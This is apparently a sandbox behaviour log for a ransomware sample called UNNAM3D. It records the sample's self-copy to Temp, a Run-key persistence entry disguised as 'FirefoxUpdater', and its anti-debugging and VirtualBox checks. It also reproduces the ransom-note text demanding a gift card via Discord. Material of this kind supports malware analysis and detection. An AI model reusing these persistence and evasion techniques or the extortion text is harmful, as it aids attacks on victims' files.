Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315870 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131564 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19315910 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 131520 False 1
Fn
Environment Get Environment String name = UKKED False 3
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes False 1
Fn
File Copy source_filename = C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe, destination_filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE True 1
Fn
File Delete filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE:Zone.Identifier False 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = FirefoxUpdater, type = REG_NONE False 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = FirefoxUpdater, data = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, size = 98, type = REG_SZ True 1
Fn
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, show_window = SW_SHOWNORMAL True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 2
Fn
Thread 0x8fc
12 0
»
Category Operation Information Success Count Logfile
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 4
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Fn
Window Set Attribute window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, index = -4, new_long = 2011243997 True 1
Fn
Module Unmap process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x8d8
71 0
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 10878994 True 16
Fn
System Get Time type = Ticks, time = 10879010 True 233
Fn
System Get Time type = Ticks, time = 10885718 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 25
Fn
Thread 0xc4
10 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 20 milliseconds (0.020 seconds) True 10
Fn
Process #2: unnam3d.exe
627 0
»
Information Value
ID #2
File Name c:\users\whuoxysd\appdata\local\temp\unnam3d.exe
Command Line "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE"
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:46
OS Process Information
»
Information Value
PID 0x948
Parent PID 0x15c (c:\users\whuoxysd\desktop\gblyrzexggw.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 248
0x 884
0x 86C
0x 868
0x 888
0x 95C
0x 960
0x 954
0x 974
0x AD8
Hook Information
»
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
...
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png 498.13 KB MD5: 9fe566aa83d07bc948f5a54e86c37214
SHA1: a1da653bd2d3fa8e0da40a261e2fae3ef5d24293
SHA256: f8681cc352768593054fa68706127f28810fad25aee6c108ddf4ae3c1655395e
SSDeep: 12288:4ekXjvAyvEQ8ZeK/+1VTArMH7k4ds9t4WJHpH8Ea4GfY+OzsC:LkXDbMZ21Vs74dsnZJHpHnacwC 		False
...
C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe 2.17 MB MD5: 1e3a2a966f593ad33125f26916267008
SHA1: 38b1a547ddee671edeee7385cac138458a6a6858
SHA256: b18c9b9200e354f81882b29dc8143ec5d6f2b731cf4c7da3800e339ffb3c8827
SSDeep: 49152:m2IoCBtJnxlyU/mWhRcQYhie6/UIdjjQuctXnFDu3nAzNjteyUHBdH3y2:xrCBrtcy/lfkD0nANte9BpC2 		False
...
Threads
Thread 0x248
310 0
»
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x76d60000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x771a0000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77de0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75c10000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x77360000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x769b11a9 True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Debug Hide c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75c644f5 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System, value_name = EnableLUA, data = 1 True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe False 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77dffda0 True 1
Fn
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x77240000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x76e60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x75870000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77e0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x77e02270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x77e022b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x77e12c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77e21f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x77e13002 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
Module Load module_name = clrjit.dll, base_address = 0x75260000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x752af70e True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Fn
Data
Environment Get Environment String name = UKKED False 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:09 (UTC) True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x75040000 True 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84674782 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 9
Fn
Module Load module_name = RichEd20.DLL, base_address = 0x74e20000 True 1
Fn
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
Fn
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 2
Fn
Environment Get Environment String name = UKKED False 4
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 4
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE.config, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 6
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 84674982 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 2
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 21
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 30
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84675710 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 84675750 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 327968 False 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 327968 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1960976634 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 84675830 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 197100 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677254 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197102 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84677294 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 197054 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677334 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197048 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677374 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197050 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720526 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262582 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720590 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262580 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720630 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262578 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720670 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 459182 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
